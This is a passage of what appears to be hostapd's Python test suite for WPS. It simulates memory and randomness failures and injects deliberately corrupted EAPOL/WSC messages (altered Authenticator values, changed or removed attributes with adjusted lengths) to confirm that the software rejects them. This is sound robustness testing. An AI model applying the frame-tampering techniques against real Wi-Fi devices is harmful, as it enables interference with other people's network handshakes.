"""WPS ER and HTTP client special cases"""
with alloc_fail(dev[0], 1, "http_link_update"):
run_wps_er_proto_test(dev[0], WPSAPHTTPServer)
with alloc_fail(dev[0], 1, "wpabuf_alloc;http_client_url"):
run_wps_er_proto_test(dev[0], WPSAPHTTPServer, no_event_url=True)
with alloc_fail(dev[0], 1, "httpread_create;http_client_tx_ready"):
run_wps_er_proto_test(dev[0], WPSAPHTTPServer, no_event_url=True)
class WPSAPHTTPServer_req_as_resp(WPSAPHTTPServer):
def handle_upnp_info(self):
self.wfile.write(b"GET / HTTP/1.1\r\n\r\n")
run_wps_er_proto_test(dev[0], WPSAPHTTPServer_req_as_resp,
no_event_url=True)
def test_ap_wps_init_oom(dev, apdev):
"""wps_init OOM cases"""
ssid = "test-wps"
appin = "12345670"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"ap_pin": appin }
hapd = hostapd.add_ap(apdev[0], params)
pin = dev[0].wps_read_pin()
with alloc_fail(hapd, 1, "wps_init"):
hapd.request("WPS_PIN any " + pin)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = hapd.wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=10)
if ev is None:
raise Exception("No EAP failure reported")
dev[0].request("WPS_CANCEL")
with alloc_fail(dev[0], 2, "wps_init"):
hapd.request("WPS_PIN any " + pin)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = hapd.wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=10)
if ev is None:
raise Exception("No EAP failure reported")
dev[0].request("WPS_CANCEL")
with alloc_fail(dev[0], 2, "wps_init"):
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].request("WPS_PBC %s" % (apdev[0]['bssid']))
ev = hapd.wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=10)
if ev is None:
raise Exception("No EAP failure reported")
dev[0].request("WPS_CANCEL")
dev[0].dump_monitor()
new_ssid = "wps-new-ssid"
new_passphrase = "1234567890"
with alloc_fail(dev[0], 3, "wps_init"):
dev[0].wps_reg(apdev[0]['bssid'], appin, new_ssid, "WPA2PSK", "CCMP",
new_passphrase, no_wait=True)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=10)
if ev is None:
raise Exception("No EAP failure reported")
dev[0].flush_scan_cache()
@remote_compatible
def test_ap_wps_invalid_assoc_req_elem(dev, apdev):
"""WPS and invalid IE in Association Request frame"""
ssid = "test-wps"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2" }
hapd = hostapd.add_ap(apdev[0], params)
pin = "12345670"
hapd.request("WPS_PIN any " + pin)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
try:
dev[0].request("VENDOR_ELEM_ADD 13 dd050050f20410")
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
for i in range(5):
ev = hapd.wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=10)
if ev and "vendor=14122" in ev:
break
if ev is None or "vendor=14122" not in ev:
raise Exception("EAP-WSC not started")
dev[0].request("WPS_CANCEL")
finally:
dev[0].request("VENDOR_ELEM_REMOVE 13 *")
def test_ap_wps_pbc_pin_mismatch(dev, apdev):
"""WPS PBC/PIN mismatch"""
ssid = "test-wps"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2" }
hapd = hostapd.add_ap(apdev[0], params)
hapd.request("SET wps_version_number 0x10")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
hapd.request("WPS_PBC")
pin = dev[0].wps_read_pin()
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = dev[0].wait_event(["CTRL-EVENT-SCAN-RESULTS"])
if ev is None:
raise Exception("Scan did not complete")
dev[0].request("WPS_CANCEL")
hapd.request("WPS_CANCEL")
dev[0].flush_scan_cache()
@remote_compatible
def test_ap_wps_ie_invalid(dev, apdev):
"""WPS PIN attempt with AP that has invalid WSC IE"""
ssid = "test-wps"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"vendor_elements": "dd050050f20410" }
hapd = hostapd.add_ap(apdev[0], params)
params = { 'ssid': "another", "vendor_elements": "dd050050f20410" }
hostapd.add_ap(apdev[1], params)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
pin = dev[0].wps_read_pin()
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = dev[0].wait_event(["CTRL-EVENT-SCAN-RESULTS"])
if ev is None:
raise Exception("Scan did not complete")
dev[0].request("WPS_CANCEL")
@remote_compatible
def test_ap_wps_scan_prio_order(dev, apdev):
"""WPS scan priority ordering"""
ssid = "test-wps"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2" }
hapd = hostapd.add_ap(apdev[0], params)
params = { 'ssid': "another", "vendor_elements": "dd050050f20410" }
hostapd.add_ap(apdev[1], params)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].scan_for_bss(apdev[1]['bssid'], freq="2412")
pin = dev[0].wps_read_pin()
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = dev[0].wait_event(["CTRL-EVENT-SCAN-RESULTS"])
if ev is None:
raise Exception("Scan did not complete")
dev[0].request("WPS_CANCEL")
def test_ap_wps_probe_req_ie_oom(dev, apdev):
"""WPS ProbeReq IE OOM"""
ssid = "test-wps"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2" }
hapd = hostapd.add_ap(apdev[0], params)
pin = dev[0].wps_read_pin()
hapd.request("WPS_PIN any " + pin)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
with alloc_fail(dev[0], 1, "wps_build_probe_req_ie"):
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = hapd.wait_event(["AP-STA-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Association not seen")
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
with alloc_fail(dev[0], 1, "wps_ie_encapsulate"):
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = hapd.wait_event(["AP-STA-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Association not seen")
dev[0].request("WPS_CANCEL")
hapd.disable()
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
time.sleep(0.2)
dev[0].flush_scan_cache()
def test_ap_wps_assoc_req_ie_oom(dev, apdev):
"""WPS AssocReq IE OOM"""
ssid = "test-wps"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2" }
hapd = hostapd.add_ap(apdev[0], params)
pin = dev[0].wps_read_pin()
hapd.request("WPS_PIN any " + pin)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
with alloc_fail(dev[0], 1, "wps_build_assoc_req_ie"):
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = hapd.wait_event(["AP-STA-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Association not seen")
dev[0].request("WPS_CANCEL")
def test_ap_wps_assoc_resp_ie_oom(dev, apdev):
"""WPS AssocResp IE OOM"""
ssid = "test-wps"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2" }
hapd = hostapd.add_ap(apdev[0], params)
pin = dev[0].wps_read_pin()
hapd.request("WPS_PIN any " + pin)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
with alloc_fail(hapd, 1, "wps_build_assoc_resp_ie"):
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = hapd.wait_event(["AP-STA-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Association not seen")
dev[0].request("WPS_CANCEL")
@remote_compatible
def test_ap_wps_bss_info_errors(dev, apdev):
"""WPS BSS info errors"""
params = { "ssid": "1",
"vendor_elements": "dd0e0050f20410440001ff101100010a" }
hostapd.add_ap(apdev[0], params)
params = { 'ssid': "2", "vendor_elements": "dd050050f20410" }
hostapd.add_ap(apdev[1], params)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].scan_for_bss(apdev[1]['bssid'], freq="2412")
bss = dev[0].get_bss(apdev[0]['bssid'])
logger.info("BSS: " + str(bss))
if "wps_state" in bss:
raise Exception("Unexpected wps_state in BSS info")
if 'wps_device_name' not in bss:
raise Exception("No wps_device_name in BSS info")
if bss['wps_device_name'] != '_':
raise Exception("Unexpected wps_device_name value")
bss = dev[0].get_bss(apdev[1]['bssid'])
logger.info("BSS: " + str(bss))
with alloc_fail(dev[0], 1, "=wps_attr_text"):
bss = dev[0].get_bss(apdev[0]['bssid'])
logger.info("BSS(OOM): " + str(bss))
def wps_run_pbc_fail_ap(apdev, dev, hapd):
hapd.request("WPS_PBC")
dev.scan_for_bss(apdev['bssid'], freq="2412")
dev.request("WPS_PBC " + apdev['bssid'])
ev = dev.wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=10)
if ev is None:
raise Exception("No EAP failure reported")
dev.request("WPS_CANCEL")
dev.wait_disconnected()
for i in range(5):
try:
dev.flush_scan_cache()
break
except Exception as e:
if str(e).startswith("Failed to trigger scan"):
# Try again
time.sleep(1)
else:
raise
def wps_run_pbc_fail(apdev, dev):
hapd = wps_start_ap(apdev)
wps_run_pbc_fail_ap(apdev, dev, hapd)
@remote_compatible
def test_ap_wps_pk_oom(dev, apdev):
"""WPS and public key OOM"""
with alloc_fail(dev[0], 1, "wps_build_public_key"):
wps_run_pbc_fail(apdev[0], dev[0])
@remote_compatible
def test_ap_wps_pk_oom_ap(dev, apdev):
"""WPS and public key OOM on AP"""
hapd = wps_start_ap(apdev[0])
with alloc_fail(hapd, 1, "wps_build_public_key"):
wps_run_pbc_fail_ap(apdev[0], dev[0], hapd)
@remote_compatible
def test_ap_wps_encr_oom_ap(dev, apdev):
"""WPS and encrypted settings decryption OOM on AP"""
hapd = wps_start_ap(apdev[0])
pin = dev[0].wps_read_pin()
hapd.request("WPS_PIN any " + pin)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
with alloc_fail(hapd, 1, "wps_decrypt_encr_settings"):
dev[0].request("WPS_PIN " + apdev[0]['bssid'] + " " + pin)
ev = hapd.wait_event(["WPS-FAIL"], timeout=10)
if ev is None:
raise Exception("No WPS-FAIL reported")
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
@remote_compatible
def test_ap_wps_encr_no_random_ap(dev, apdev):
"""WPS and no random data available for encryption on AP"""
hapd = wps_start_ap(apdev[0])
with fail_test(hapd, 1, "os_get_random;wps_build_encr_settings"):
wps_run_pbc_fail_ap(apdev[0], dev[0], hapd)
@remote_compatible
def test_ap_wps_e_hash_no_random_sta(dev, apdev):
"""WPS and no random data available for e-hash on STA"""
with fail_test(dev[0], 1, "os_get_random;wps_build_e_hash"):
wps_run_pbc_fail(apdev[0], dev[0])
@remote_compatible
def test_ap_wps_m1_no_random(dev, apdev):
"""WPS and no random for M1 on STA"""
with fail_test(dev[0], 1, "os_get_random;wps_build_m1"):
wps_run_pbc_fail(apdev[0], dev[0])
@remote_compatible
def test_ap_wps_m1_oom(dev, apdev):
"""WPS and OOM for M1 on STA"""
with alloc_fail(dev[0], 1, "wps_build_m1"):
wps_run_pbc_fail(apdev[0], dev[0])
@remote_compatible
def test_ap_wps_m3_oom(dev, apdev):
"""WPS and OOM for M3 on STA"""
with alloc_fail(dev[0], 1, "wps_build_m3"):
wps_run_pbc_fail(apdev[0], dev[0])
@remote_compatible
def test_ap_wps_m5_oom(dev, apdev):
"""WPS and OOM for M5 on STA"""
hapd = wps_start_ap(apdev[0])
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
for i in range(1, 3):
with alloc_fail(dev[0], i, "wps_build_m5"):
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=10)
if ev is None:
raise Exception("No EAP failure reported")
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
@remote_compatible
def test_ap_wps_m5_no_random(dev, apdev):
"""WPS and no random for M5 on STA"""
with fail_test(dev[0], 1,
"os_get_random;wps_build_encr_settings;wps_build_m5"):
wps_run_pbc_fail(apdev[0], dev[0])
@remote_compatible
def test_ap_wps_m7_oom(dev, apdev):
"""WPS and OOM for M7 on STA"""
hapd = wps_start_ap(apdev[0])
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
for i in range(1, 3):
with alloc_fail(dev[0], i, "wps_build_m7"):
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=10)
if ev is None:
raise Exception("No EAP failure reported")
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
@remote_compatible
def test_ap_wps_m7_no_random(dev, apdev):
"""WPS and no random for M7 on STA"""
with fail_test(dev[0], 1,
"os_get_random;wps_build_encr_settings;wps_build_m7"):
wps_run_pbc_fail(apdev[0], dev[0])
@remote_compatible
def test_ap_wps_wsc_done_oom(dev, apdev):
"""WPS and OOM for WSC_Done on STA"""
with alloc_fail(dev[0], 1, "wps_build_wsc_done"):
wps_run_pbc_fail(apdev[0], dev[0])
def test_ap_wps_random_psk_fail(dev, apdev):
"""WPS and no random for PSK on AP"""
ssid = "test-wps"
pskfile = "/tmp/ap_wps_per_enrollee_psk.psk_file"
appin = "12345670"
try:
os.remove(pskfile)
except:
pass
try:
with open(pskfile, "w") as f:
f.write("# WPA PSKs\n")
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa": "2", "wpa_key_mgmt": "WPA-PSK",
"rsn_pairwise": "CCMP", "ap_pin": appin,
"wpa_psk_file": pskfile }
hapd = hostapd.add_ap(apdev[0], params)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
with fail_test(hapd, 1, "os_get_random;wps_build_cred_network_key"):
dev[0].request("WPS_REG " + apdev[0]['bssid'] + " " + appin)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=10)
if ev is None:
raise Exception("No EAP failure reported")
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
with fail_test(hapd, 1, "os_get_random;wps_build_cred"):
wps_run_pbc_fail_ap(apdev[0], dev[0], hapd)
with alloc_fail(hapd, 1, "wps_build_cred"):
wps_run_pbc_fail_ap(apdev[0], dev[0], hapd)
with alloc_fail(hapd, 2, "wps_build_cred"):
wps_run_pbc_fail_ap(apdev[0], dev[0], hapd)
finally:
os.remove(pskfile)
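# The helpers below run the EAP-WSC exchange over the control interface:
# with ext_eapol_frame_io enabled, each side reports its outgoing EAPOL
# frames as EAPOL-TX events and the test injects them into the peer with
# the EAPOL_RX command, which allows individual WSC messages to be modified
# in transit.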
def wps_ext_eap_identity_req(dev, hapd, bssid):
logger.debug("EAP-Identity/Request")
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX from hostapd")
res = dev.request("EAPOL_RX " + bssid + " " + ev.split(' ')[2])
if "OK" not in res:
raise Exception("EAPOL_RX to wpa_supplicant failed")
def wps_ext_eap_identity_resp(hapd, dev, addr):
ev = dev.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX from wpa_supplicant")
res = hapd.request("EAPOL_RX " + addr + " " + ev.split(' ')[2])
if "OK" not in res:
raise Exception("EAPOL_RX to hostapd failed")
def wps_ext_eap_wsc(dst, src, src_addr, msg):
logger.debug(msg)
ev = src.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
res = dst.request("EAPOL_RX " + src_addr + " " + ev.split(' ')[2])
if "OK" not in res:
raise Exception("EAPOL_RX failed")
def wps_start_ext(apdev, dev, pbc=False, pin=None):
addr = dev.own_addr()
bssid = apdev['bssid']
ssid = "test-wps-conf"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"}
hapd = hostapd.add_ap(apdev, params)
if pbc:
hapd.request("WPS_PBC")
else:
if pin is None:
pin = dev.wps_read_pin()
hapd.request("WPS_PIN any " + pin)
dev.scan_for_bss(bssid, freq="2412")
hapd.request("SET ext_eapol_frame_io 1")
dev.request("SET ext_eapol_frame_io 1")
if pbc:
dev.request("WPS_PBC " + bssid)
else:
dev.request("WPS_PIN " + bssid + " " + pin)
return addr,bssid,hapd
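# Corrupt the Authenticator attribute at the end of a WSC message: the hex
# dump ends with the TLV header '10050008' (attribute 0x1005, length 8)
# followed by 16 hex digits of value, so flipping the last nibble breaks
# the authenticator validation on the receiving side.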
def wps_auth_corrupt(dst, src, addr):
ev = src.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
src.request("SET ext_eapol_frame_io 0")
dst.request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
if msg[-24:-16] != '10050008':
raise Exception("Could not find Authenticator attribute")
# Corrupt Authenticator value
msg = msg[:-1] + '%x' % ((int(msg[-1], 16) + 1) % 16)
res = dst.request("EAPOL_RX " + addr + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
def wps_fail_finish(hapd, dev, fail_str):
ev = hapd.wait_event(["WPS-FAIL"], timeout=5)
if ev is None:
raise Exception("WPS-FAIL not indicated")
if fail_str not in ev:
raise Exception("Unexpected WPS-FAIL value: " + ev)
dev.request("WPS_CANCEL")
dev.wait_disconnected()
def wps_auth_corrupt_from_ap(dev, hapd, bssid, fail_str):
wps_auth_corrupt(dev, hapd, bssid)
wps_fail_finish(hapd, dev, fail_str)
def wps_auth_corrupt_to_ap(dev, hapd, addr, fail_str):
wps_auth_corrupt(hapd, dev, addr)
wps_fail_finish(hapd, dev, fail_str)
def test_ap_wps_authenticator_mismatch_m2(dev, apdev):
"""WPS and Authenticator attribute mismatch in M2"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0])
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
logger.debug("M2")
wps_auth_corrupt_from_ap(dev[0], hapd, bssid, "msg=5")
def test_ap_wps_authenticator_mismatch_m3(dev, apdev):
"""WPS and Authenticator attribute mismatch in M3"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0])
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
wps_ext_eap_wsc(dev[0], hapd, bssid, "M2")
logger.debug("M3")
wps_auth_corrupt_to_ap(dev[0], hapd, addr, "msg=7")
def test_ap_wps_authenticator_mismatch_m4(dev, apdev):
"""WPS and Authenticator attribute mismatch in M4"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0])
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
wps_ext_eap_wsc(dev[0], hapd, bssid, "M2")
wps_ext_eap_wsc(hapd, dev[0], addr, "M3")
logger.debug("M4")
wps_auth_corrupt_from_ap(dev[0], hapd, bssid, "msg=8")
def test_ap_wps_authenticator_mismatch_m5(dev, apdev):
"""WPS and Authenticator attribute mismatch in M5"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0])
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
wps_ext_eap_wsc(dev[0], hapd, bssid, "M2")
wps_ext_eap_wsc(hapd, dev[0], addr, "M3")
wps_ext_eap_wsc(dev[0], hapd, bssid, "M4")
logger.debug("M5")
wps_auth_corrupt_to_ap(dev[0], hapd, addr, "msg=9")
def test_ap_wps_authenticator_mismatch_m6(dev, apdev):
"""WPS and Authenticator attribute mismatch in M6"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0])
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
wps_ext_eap_wsc(dev[0], hapd, bssid, "M2")
wps_ext_eap_wsc(hapd, dev[0], addr, "M3")
wps_ext_eap_wsc(dev[0], hapd, bssid, "M4")
wps_ext_eap_wsc(hapd, dev[0], addr, "M5")
logger.debug("M6")
wps_auth_corrupt_from_ap(dev[0], hapd, bssid, "msg=10")
def test_ap_wps_authenticator_mismatch_m7(dev, apdev):
"""WPS and Authenticator attribute mismatch in M7"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0])
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
wps_ext_eap_wsc(dev[0], hapd, bssid, "M2")
wps_ext_eap_wsc(hapd, dev[0], addr, "M3")
wps_ext_eap_wsc(dev[0], hapd, bssid, "M4")
wps_ext_eap_wsc(hapd, dev[0], addr, "M5")
wps_ext_eap_wsc(dev[0], hapd, bssid, "M6")
logger.debug("M7")
wps_auth_corrupt_to_ap(dev[0], hapd, addr, "msg=11")
def test_ap_wps_authenticator_mismatch_m8(dev, apdev):
"""WPS and Authenticator attribute mismatch in M8"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0])
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
wps_ext_eap_wsc(dev[0], hapd, bssid, "M2")
wps_ext_eap_wsc(hapd, dev[0], addr, "M3")
wps_ext_eap_wsc(dev[0], hapd, bssid, "M4")
wps_ext_eap_wsc(hapd, dev[0], addr, "M5")
wps_ext_eap_wsc(dev[0], hapd, bssid, "M6")
wps_ext_eap_wsc(hapd, dev[0], addr, "M7")
logger.debug("M8")
wps_auth_corrupt_from_ap(dev[0], hapd, bssid, "msg=12")
def test_ap_wps_authenticator_missing_m2(dev, apdev):
"""WPS and Authenticator attribute missing from M2"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0])
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
logger.debug("M2")
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
if msg[-24:-16] != '10050008':
raise Exception("Could not find Authenticator attribute")
# Remove Authenticator value
msg = msg[:-24]
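    # Dropping the 12-octet Authenticator TLV also requires shrinking the
    # EAPOL body length (hex chars 4..8) and the EAP length (hex chars
    # 12..16) by 12 octets.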
mlen = "%04x" % (int(msg[4:8], 16) - 12)
msg = msg[0:4] + mlen + msg[8:12] + mlen + msg[16:]
res = dev[0].request("EAPOL_RX " + bssid + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
wps_fail_finish(hapd, dev[0], "msg=5")
def test_ap_wps_m2_dev_passwd_id_p2p(dev, apdev):
"""WPS and M2 with different Device Password ID (P2P)"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0])
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
logger.debug("M2")
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
if msg[722:730] != '10120002':
raise Exception("Could not find Device Password ID attribute")
    # Replace the Device Password ID value with 0x0005 (Registrar-specified,
    # as used by P2P). This will fail the Authenticator check, but allows the
    # code path in wps_process_dev_pw_id() to be checked from the debug log.
msg = msg[0:730] + "0005" + msg[734:]
res = dev[0].request("EAPOL_RX " + bssid + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
wps_fail_finish(hapd, dev[0], "msg=5")
def test_ap_wps_m2_dev_passwd_id_change_pin_to_pbc(dev, apdev):
"""WPS and M2 with different Device Password ID (PIN to PBC)"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0])
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
logger.debug("M2")
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
if msg[722:730] != '10120002':
raise Exception("Could not find Device Password ID attribute")
# Replace Device Password ID value (PIN --> PBC). This will be rejected.
msg = msg[0:730] + "0004" + msg[734:]
res = dev[0].request("EAPOL_RX " + bssid + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
wps_fail_finish(hapd, dev[0], "msg=5")
def test_ap_wps_m2_dev_passwd_id_change_pbc_to_pin(dev, apdev):
"""WPS and M2 with different Device Password ID (PBC to PIN)"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pbc=True)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
logger.debug("M2")
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
if msg[722:730] != '10120002':
raise Exception("Could not find Device Password ID attribute")
    # Replace the Device Password ID value with 0x0000 (Default/PIN). This
    # will fail the Authenticator check, but allows the code path in
    # wps_process_dev_pw_id() to be checked from the debug log.
msg = msg[0:730] + "0000" + msg[734:]
res = dev[0].request("EAPOL_RX " + bssid + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
wps_fail_finish(hapd, dev[0], "msg=5")
dev[0].flush_scan_cache()
def test_ap_wps_m2_missing_dev_passwd_id(dev, apdev):
"""WPS and M2 without Device Password ID"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0])
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
logger.debug("M2")
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
if msg[722:730] != '10120002':
raise Exception("Could not find Device Password ID attribute")
    # Remove the Device Password ID attribute. This will fail the
    # Authenticator check, but allows the code path in
    # wps_process_dev_pw_id() to be checked from the debug log.
mlen = "%04x" % (int(msg[4:8], 16) - 6)
msg = msg[0:4] + mlen + msg[8:12] + mlen + msg[16:722] + msg[734:]
res = dev[0].request("EAPOL_RX " + bssid + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
wps_fail_finish(hapd, dev[0], "msg=5")
def test_ap_wps_m2_missing_registrar_nonce(dev, apdev):
"""WPS and M2 without Registrar Nonce"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pbc=True)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
logger.debug("M2")
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
if msg[96:104] != '10390010':
raise Exception("Could not find Registrar Nonce attribute")
# Remove Registrar Nonce. This will fail Authenticator check, but
# allows the code path in wps_process_registrar_nonce() to be checked from
# the debug log.
mlen = "%04x" % (int(msg[4:8], 16) - 20)
msg = msg[0:4] + mlen + msg[8:12] + mlen + msg[16:96] + msg[136:]
res = dev[0].request("EAPOL_RX " + bssid + " " + msg)
if "OK" not in res:
